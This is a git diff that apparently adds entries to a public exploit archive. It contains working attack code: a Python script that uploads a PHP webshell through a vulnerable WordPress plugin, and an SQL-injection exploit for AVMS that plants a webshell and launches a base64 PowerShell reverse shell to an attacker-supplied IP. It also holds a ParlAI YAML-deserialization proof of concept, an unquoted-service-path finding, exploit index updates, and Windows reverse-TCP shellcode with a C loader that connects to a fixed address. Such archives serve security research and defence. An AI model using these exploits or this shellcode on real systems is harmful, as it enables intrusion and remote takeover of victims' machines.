+# Google Dork: inurl:/wp-content/plugins/download-from-files
+# Date: 10/09/2021
+# Exploit Author: spacehen
+# Vendor Homepage: https://wordpress.org/plugins/download-from-files/
+# Version: <= 1.48
+# Tested on: Ubuntu 20.04.1 LTS (x86)
+
+import os.path
+from os import path
+import json
+import requests;
+import sys
+
+def print_banner():
+ print("Download From Files <= 1.48 - Arbitrary File Upload")
+ print("Author -> spacehen (www.github.com/spacehen)")
+
+def print_usage():
+ print("Usage: python3 exploit.py [target url] [php file]")
+ print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
+
+def vuln_check(uri):
+ response = requests.get(uri)
+ raw = response.text
+
+ if ("Sikeres" in raw):
+ return True;
+ else:
+ return False;
+
+def main():
+
+ print_banner()
+ if(len(sys.argv) != 3):
+ print_usage();
+ sys.exit(1);
+
+ base = sys.argv[1]
+ file_path = sys.argv[2]
+
+ ajax_action = 'download_from_files_617_fileupload'
+ admin = '/wp-admin/admin-ajax.php';
+
+ uri = base + admin + '?action=' + ajax_action ;
+ check = vuln_check(uri);
+
+ if(check == False):
+ print("(*) Target not vulnerable!");
+ sys.exit(1)
+
+ if( path.isfile(file_path) == False):
+ print("(*) Invalid file!")
+ sys.exit(1)
+
+ files = {'files[]' : open(file_path)}
+ data = {
+ "allowExt" : "php4,phtml",
+ "filesName" : "files",
+ "maxSize" : "1000",
+ "uploadDir" : "."
+ }
+ print("Uploading Shell...");
+ response = requests.post(uri, files=files, data=data )
+ file_name = path.basename(file_path)
+ if("ok" in response.text):
+ print("Shell Uploaded!")
+ if(base[-1] != '/'):
+ base += '/'
+ print(base + "wp-admin/" + file_name);
+ else:
+ print("Shell Upload Failed")
+ sys.exit(1)
+
+main();
\ No newline at end of file
diff --git a/exploits/php/webapps/50288.py b/exploits/php/webapps/50288.py
new file mode 100755
index 000000000..8844b0460
--- /dev/null
+++ b/exploits/php/webapps/50288.py
@@ -0,0 +1,77 @@
+# Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE
+# Date: 2021-08-13
+# Exploit Author: mari0x00
+# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
+# Version: 1.0
+# Tested on: Windows 10 + XAMPP
+
+#!/usr/bin/python3
+
+import requests, socket, threading
+import base64, time, sys
+
+print(('''###########################################################''',"red"))
+print(('''########### AVMS SQLi to RCE by mari0x00 ############''',"red"))
+print(('''###########################################################''',"red"))
+print("")
+
+URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/'
+path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php'
+path = path.replace("\\", "\\\\")
+rhost = input("Provide attacker IP: ") or "127.0.0.1"
+rport = input("Provide attacker listening port: ") or "1337"
+
+
+# sending webshell
+payload = {"username": "admin' union select '' into outfile '" + path + "' -- 'a", "password": "test", "login": ''}
+requests.post(URL, data=payload)
+
+
+def shell(rhost, rport):
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ try:
+ s.bind((rhost, int(rport)))
+ except socket.error as msg:
+ print("Bind failed. Error Code : " + str(msg[0]) + " Message " + msg[1])
+ sys.exit()
+
+ s.settimeout(5)
+ s.listen(5)
+ print('[+] Waiting for connection..')
+
+ conn = False
+ command=''
+
+ while conn == False:
+ try:
+ conn, addr = s.accept()
+ print("Got a connection from " + addr[0] + ":" + str(addr[1]))
+ conn.send('\n'.encode())
+ time.sleep(1)
+ print(conn.recv(0x10000).decode())
+ while(command != 'exit'):
+ command=input('')
+ conn.send((command + '\n').encode())
+ time.sleep(.3)
+ res = conn.recv(0x10000)
+ print(res.decode())
+ s.close()
+ sys.exit("[!] Program exited")
+ except socket.timeout:
+ pass
+
+
+def start_shell(rhost, rport):
+ revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\""
+ revshell = revshell.encode('ascii')
+ revshell = base64.b64encode(revshell)
+ revshell = revshell.decode('ascii')
+ connection = requests.get(URL+"/lol.php?cmd=" + revshell)
+
+print("[+] Starting to listen on port " + rport)
+time.sleep(0.5)
+threading.Thread(target=shell, args=(rhost, rport)).start()
+time.sleep(2)
+print("[+] Sending the reverse shell payload")
+threading.Thread(target=start_shell, args=(rhost, rport)).start()
\ No newline at end of file
diff --git a/exploits/python/local/50289.py b/exploits/python/local/50289.py
new file mode 100755
index 000000000..00cc541e3
--- /dev/null
+++ b/exploits/python/local/50289.py
@@ -0,0 +1,49 @@
+# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai
+# Date: 2021-09-11
+# Exploit Author: Abhiram V
+# Vendor Homepage: https://parl.ai/
+# Software Link: https://github.com/facebookresearch/ParlAI
+# Version: < 1.1.0
+# Tested on: Linux
+# CVE: CVE-2021-24040
+# References :
+# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg
+# | https://anon-artist.github.io/blogs/blog3.html |
+
+############################################################################
+
+Introduction
+ParlAI (pronounced “par-lay”) is a free, open-source python framework for
+sharing, training and evaluating AI models on a variety of openly available
+dialogue datasets.
+
+############################################################################
+
+Vulnerability details
+
+############################################################################
+
+Description
+ParlAI was vulnerable to YAML deserialization attack caused by unsafe
+loading which leads to Arbitrary Code Execution.
+
+Proof of Concept
+
+Create the following PoC file (exploit.py)
+
+import os
+#os.system('pip3 install parlai')
+from parlai.chat_service.utils import config
+exploit = """!!python/object/new:type
+ args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
+ listitems: "__import__('os').system('xcalc')"
+"""
+open('config.yml','w+').write(exploit)
+config.parse_configuration_file('config.yml')
+
+Execute the python script ie, python3 exploit.py
+
+Impact
+Code Execution
+
+############################################################################
\ No newline at end of file
diff --git a/exploits/windows/local/50273.txt b/exploits/windows/local/50273.txt
new file mode 100644
index 000000000..606c2c334
--- /dev/null
+++ b/exploits/windows/local/50273.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Active WebCam 11.5 - Unquoted Service Path
+# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io)
+# Date: 09.09.2021
+# Software Link: https://www.techspot.com/downloads/175-active-webcam.html
+# Vendor Homepage: https://www.pysoft.com/
+# Version: 11.5
+# Tested on: Windows 10
+
+# Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options
+
+# Proof of Concept:
+
+C:\Users\death>sc qc ACTIVEWEBCAM
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ACTIVEWEBCAM
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Active WebCam\WebCam.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Active WebCam
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+Active WebCam ACTIVEWEBCAM C:\Program Files\Active WebCam\WebCam.exe Auto
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a909c6204..3e7584ca7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11385,6 +11385,9 @@ id,file,description,date,author,type,platform,port
50236,exploits/linux/local/50236.py,"MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)",1970-01-01,ninpwn,local,linux,
50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
+50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
+50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",1970-01-01,Neurogenesia,local,hardware,
+50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",1970-01-01,"Abhiram V",local,python,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18528,6 +18531,7 @@ id,file,description,date,author,type,platform,port
50160,exploits/hardware/remote/50160.txt,"Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)",1970-01-01,"Ivan Nikolsky",remote,hardware,
50170,exploits/java/remote/50170.java,"Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)",1970-01-01,"Christopher Ellis",remote,java,
50216,exploits/linux/remote/50216.py,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",1970-01-01,"Khaled Salem",remote,linux,
+50282,exploits/hardware/remote/50282.txt,"ECOA Building Automation System - Hard-coded Credentials SSH Access",1970-01-01,Neurogenesia,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44394,3 +44398,16 @@ id,file,description,date,author,type,platform,port
50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php,
50270,exploits/php/webapps/50270.txt,"WordPress Plugin TablePress 1.14 - CSV Injection",1970-01-01,"Nikhil Kapoor",webapps,php,
50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",1970-01-01,"Emre Aslan",webapps,php,
+50274,exploits/php/webapps/50274.txt,"Men Salon Management System 1.0 - Multiple Vulnerabilities",1970-01-01,"Aryan Chehreghani",webapps,php,
+50275,exploits/hardware/webapps/50275.txt,"ECOA Building Automation System - Weak Default Credentials",1970-01-01,Neurogenesia,webapps,hardware,
+50276,exploits/hardware/webapps/50276.txt,"ECOA Building Automation System - Path Traversal Arbitrary File Upload",1970-01-01,Neurogenesia,webapps,hardware,
+50277,exploits/hardware/webapps/50277.txt,"ECOA Building Automation System - Directory Traversal Content Disclosure",1970-01-01,Neurogenesia,webapps,hardware,
+50278,exploits/hardware/webapps/50278.txt,"ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,Neurogenesia,webapps,hardware,
+50279,exploits/hardware/webapps/50279.txt,"ECOA Building Automation System - Cookie Poisoning Authentication Bypass",1970-01-01,Neurogenesia,webapps,hardware,
+50280,exploits/hardware/webapps/50280.txt,"ECOA Building Automation System - Configuration Download Information Disclosure",1970-01-01,Neurogenesia,webapps,hardware,
+50281,exploits/hardware/webapps/50281.txt,"ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function",1970-01-01,Neurogenesia,webapps,hardware,
+50284,exploits/hardware/webapps/50284.txt,"ECOA Building Automation System - Remote Privilege Escalation",1970-01-01,Neurogenesia,webapps,hardware,
+50285,exploits/hardware/webapps/50285.txt,"ECOA Building Automation System - Local File Disclosure",1970-01-01,Neurogenesia,webapps,hardware,
+50286,exploits/hardware/webapps/50286.txt,"ECOA Building Automation System - Arbitrary File Deletion",1970-01-01,Neurogenesia,webapps,hardware,
+50287,exploits/php/webapps/50287.py,"Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,
+50288,exploits/php/webapps/50288.py,"Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE",1970-01-01,mari0x00,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index b6ab0173b..5d6d1105b 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1041,3 +1041,4 @@ id,file,description,date,author,type,platform
50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",1970-01-01,d7x,shellcode,linux_x86
50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86
50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86
+50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
diff --git a/shellcodes/windows_x86-64/50291.c b/shellcodes/windows_x86-64/50291.c
new file mode 100644
index 000000000..16f87a8c9
--- /dev/null
+++ b/shellcodes/windows_x86-64/50291.c
@@ -0,0 +1,290 @@
+# Title: Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
+# Date: 09.12.2021
+# Author: Xenofon Vassilakopoulos
+# Tested on: Windows/x64 - 10.0.19043 N/A Build 19043
+
+/*
+
+MIT License
+
+Copyright (c) 2021 Xenofon Vassilakopoulos
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
+
+
+[BITS 32]
+
+global _start
+
+section .text
+
+_start:
+
+; Locate Kernelbase.dll address
+XOR ECX, ECX ;zero out ECX
+MOV EAX, FS:[ecx + 0x30] ;EAX = PEB
+MOV EAX, [EAX + 0x0c] ;EAX = PEB->Ldr
+MOV ESI, [EAX + 0x14] ;ESI = PEB->Ldr.InMemoryOrderModuleList
+LODSD ;memory address of the second list entry structure
+XCHG EAX, ESI ;EAX = ESI , ESI = EAX
+LODSD ;memory address of the third list entry structure
+XCHG EAX, ESI ;EAX = ESI , ESI = EAX
+LODSD ;memory address of the fourth list entry structure
+MOV EBX, [EAX + 0x10] ;EBX = Base address
+
+; Export Table
+MOV EDX, DWORD [EBX + 0x3C] ;EDX = DOS->e_lfanew
+ADD EDX, EBX ;EDX = PE Header
+MOV EDX, DWORD [EDX + 0x78] ;EDX = Offset export table
+ADD EDX, EBX ;EDX = Export table
+MOV ESI, DWORD [EDX + 0x20] ;ESI = Offset names table
+ADD ESI, EBX ;ESI = Names table
+XOR ECX, ECX ;EXC = 0
+
+GetFunction :
+
+INC ECX; increment counter
+LODSD ;Get name offset
+ADD EAX, EBX ;Get function name
+CMP dword [EAX], 0x50746547 ;"PteG"
+JNZ SHORT GetFunction ;jump to GetFunction label if not "GetP"
+CMP dword [EAX + 0x4], 0x41636F72 ;"rocA"
+JNZ SHORT GetFunction ;jump to GetFunction label if not "rocA"
+CMP dword [EAX + 0x8], 0x65726464 ;"ddre"
+JNZ SHORT GetFunction ;jump to GetFunction label if not "ddre"
+
+MOV ESI, DWORD [EDX + 0x24] ;ESI = Offset ordinals
+ADD ESI, EBX ;ESI = Ordinals table
+MOV CX, WORD [ESI + ECX * 2] ;CX = Number of function
+DEC ECX ;Decrement the ordinal
+MOV ESI, DWORD [EDX + 0x1C] ;ESI = Offset address table
+ADD ESI, EBX ;ESI = Address table
+MOV EDX, DWORD [ESI + ECX * 4] ;EDX = Pointer(offset)
+ADD EDX, EBX ;EDX = GetProcAddress
+
+; Get the Address of LoadLibraryA function
+XOR ECX, ECX ;ECX = 0
+PUSH EBX ;Kernel32 base address
+PUSH EDX ;GetProcAddress
+PUSH ECX ;0
+PUSH 0x41797261 ;"Ayra"
+PUSH 0x7262694C ;"rbiL"
+PUSH 0x64616F4C ;"daoL"
+PUSH ESP ;"LoadLibrary"
+PUSH EBX ;Kernel32 base address
+MOV ESI, EBX ;save the kernel32 address in esi for later
+CALL EDX ;GetProcAddress(LoadLibraryA)
+
+ADD ESP, 0xC ;pop "LoadLibraryA"
+POP EDX ;EDX = 0
+PUSH EAX ;EAX = LoadLibraryA
+PUSH EDX ;ECX = 0
+MOV DX, 0x6C6C ;"ll"
+PUSH EDX
+PUSH 0x642E3233 ;"d.23"
+PUSH 0x5F327377 ;"_2sw"
+PUSH ESP ;"ws2_32.dll"
+CALL EAX ;LoadLibrary("ws2_32.dll")
+
+ADD ESP, 0x10 ;Clean stack
+MOV EDX, [ESP + 0x4] ;EDX = GetProcAddress
+PUSH 0x61617075 ;"aapu"
+SUB word [ESP + 0x2], 0x6161 ;"pu" (remove "aa")
+PUSH 0x74726174 ;"trat"
+PUSH 0x53415357 ;"SASW"
+PUSH ESP ;"WSAStartup"
+PUSH EAX ;ws2_32.dll address
+MOV EDI, EAX ;save ws2_32.dll to use it later
+CALL EDX ;GetProcAddress(WSAStartup)
+
+; Call WSAStartUp
+XOR EBX, EBX ;zero out ebx register
+MOV BX, 0x0190 ;EAX = sizeof(struct WSAData)
+SUB ESP, EBX ;allocate space for the WSAData structure
+PUSH ESP ;push a pointer to WSAData structure
+PUSH EBX ;Push EBX as wVersionRequested
+CALL EAX ;Call WSAStartUp
+
+;Find the address of WSASocketA
+ADD ESP, 0x10 ;Align the stack
+XOR EBX, EBX ;zero out the EBX register
+ADD BL, 0x4 ;add 0x4 at the lower register BL
+IMUL EBX, 0x64 ;EBX = 0x190
+MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
+PUSH 0x61614174 ;"aaAt"
+SUB word [ESP + 0x2], 0x6161 ;"At" (remove "aa")
+PUSH 0x656b636f ;"ekco"
+PUSH 0x53415357 ;"SASW"
+PUSH ESP ;"WSASocketA", GetProcAddress 2nd argument
+MOV EAX, EDI ;EAX now holds the ws2_32.dll address
+PUSH EAX ;push the first argument of GetProcAddress
+CALL EDX ;call GetProcAddress
+PUSH EDI ;save the ws2_32.dll address to use it later
+
+;call WSASocketA
+XOR ECX, ECX ;zero out ECX register
+PUSH EDX ;null value for dwFlags argument
+PUSH EDX ;zero value since we dont have an existing socket group
+PUSH EDX ;null value for lpProtocolInfo
+MOV DL, 0x6 ;IPPROTO_TCP
+PUSH EDX ;set the protocol argument
+INC ECX ;SOCK_STREAM(TCP)
+PUSH ECX ;set the type argument
+INC ECX ;AF_INET(IPv4)
+PUSH ECX ;set the ddress family specification argument
+CALL EAX ;call WSASocketA
+XCHG EAX, ECX ;save the socket returned from WSASocketA at EAX to ECX in order to use it later
+
+;Find the address of connect
+POP EDI ;load previously saved ws2_32.dll address to ECX
+ADD ESP, 0x10 ;Align stack
+XOR EBX, EBX ;zero out EBX
+ADD BL, 0x4 ;add 0x4 to lower register BL
+IMUL EBX, 0x63 ;EBX = 0x18c
+MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
+PUSH 0x61746365 ;"atce"
+SUB word [ESP + 0x3], 0x61 ;"tce" (remove "a")
+PUSH 0x6e6e6f63 ;"nnoc"
+PUSH ESP ;"connect", second argument of GetProcAddress
+PUSH EDI ;ws32_2.dll address, first argument of GetProcAddress
+XCHG ECX, EBP
+CALL EDX ;call GetProcAddress
+
+;call connect
+PUSH 0x0bc9a8c0 ;sin_addr set to 192.168.201.11
+PUSH word 0x5c11 ;port = 4444
+XOR EBX, EBX ;zero out EBX
+add BL, 0x2 ;TCP protocol
+PUSH word BX ;push the protocol value on the stack
+MOV EDX, ESP ;pointer to sockaddr structure (IP,Port,Protocol)
+PUSH byte 16 ;the size of sockaddr - 3rd argument of connect
+PUSH EDX ;push the sockaddr - 2nd argument of connect
+PUSH EBP ;socket descriptor = 64 - 1st argument of connect
+XCHG EBP, EDI
+CALL EAX ;execute connect;
+
+;Find the address of CreateProcessA
+ADD ESP, 0x14 ;Clean stack
+XOR EBX, EBX ;zero out EBX
+ADD BL, 0x4 ;add 0x4 to lower register BL
+IMUL EBX, 0x62 ;EBX = 0x194
+MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
+PUSH 0x61614173 ;"aaAs"
+SUB dword [ESP + 0x2], 0x6161 ;"As"
+PUSH 0x7365636f ;"seco"
+PUSH 0x72506574 ;"rPet"
+PUSH 0x61657243 ;"aerC"
+PUSH ESP ;"CreateProcessA" - 2nd argument of GetProcAddress
+MOV EBP, ESI ;move the kernel32.dll to EBP
+PUSH EBP ;kernel32.dll address - 1st argument of GetProcAddress
+CALL EDX ;execute GetProcAddress
+PUSH EAX ;address of CreateProcessA
+LEA EBP, [EAX] ;EBP now points to the address of CreateProcessA
+
+;call CreateProcessA
+PUSH 0x61646d63 ;"admc"
+SUB word [ESP + 0x3], 0x61 ;"dmc" ( remove a)
+MOV ECX, ESP ;ecx now points to "cmd" string
+XOR EDX, EDX ;zero out EDX
+SUB ESP, 16
+MOV EBX, esp ;pointer for ProcessInfo
+
+;STARTUPINFOA struct
+PUSH EDI ;hStdError => saved socket
+PUSH EDI ;hStdOutput => saved socket
+PUSH EDI ;hStdInput => saved socket
+PUSH EDX ;lpReserved2 => NULL
+PUSH EDX ;cbReserved2 => NULL
+XOR EAX, EAX ;zero out EAX register
+INC EAX ;EAX => 0x00000001
+ROL EAX, 8 ;EAX => 0x00000100
+PUSH EAX ;dwFlags => STARTF_USESTDHANDLES 0x00000100
+PUSH EDX ;dwFillAttribute => NULL
+PUSH EDX ;dwYCountChars => NULL
+PUSH EDX ;dwXCountChars => NULL
+PUSH EDX ;dwYSize => NULL
+PUSH EDX ;dwXSize => NULL
+PUSH EDX ;dwY => NULL
+PUSH EDX ;dwX => NULL
+PUSH EDX ;pTitle => NULL
+PUSH EDX ;pDesktop => NULL
+PUSH EDX ;pReserved => NULL
+XOR EAX, EAX ;zero out EAX
+ADD AL, 44 ;cb => 0x44 (size of struct)
+PUSH EAX ;eax points to STARTUPINFOA
+
+;ProcessInfo struct
+MOV EAX, ESP ;pStartupInfo
+PUSH EBX ;pProcessInfo
+PUSH EAX ;pStartupInfo
+PUSH EDX ;CurrentDirectory => NULL
+PUSH EDX ;pEnvironment => NULL
+PUSH EDX ;CreationFlags => 0
+XOR EAX, EAX ;zero out EAX register
+INC EAX ;EAX => 0x00000001
+PUSH EAX ;InheritHandles => TRUE => 1
+PUSH EDX ;pThreadAttributes => NULL
+PUSH EDX ;pProcessAttributes => NULL
+PUSH ECX ;pCommandLine => pointer to "cmd"
+PUSH EDX ;ApplicationName => NULL
+CALL EBP ;execute CreateProcessA
+
+*/
+
+#include
+#include
+#include
+
+char code[] =
+"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b"
+"\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31"
+"\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f"
+"\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde"
+"\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53"
+"\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54"
+"\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33"
+"\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04"
+"\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68"
+"\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc"
+"\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c"
+"\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68"
+"\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06"
+"\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b"
+"\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63"
+"\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c"
+"\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83"
+"\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61"
+"\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72"
+"\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64"
+"\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57"
+"\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52"
+"\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50"
+"\x52\x52\x51\x52\xff\xd5";
+
+int main(int argc, char** argv)
+{
+ //HWND hWnd = GetConsoleWindow();
+ //ShowWindow(hWnd, SW_HIDE);
+ printf("Shellcode Length: %d\n", strlen(code));
+ void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(exec, code, sizeof(code));
+ ((void(*)())exec)();
+
+ return 0;
+}
\ No newline at end of file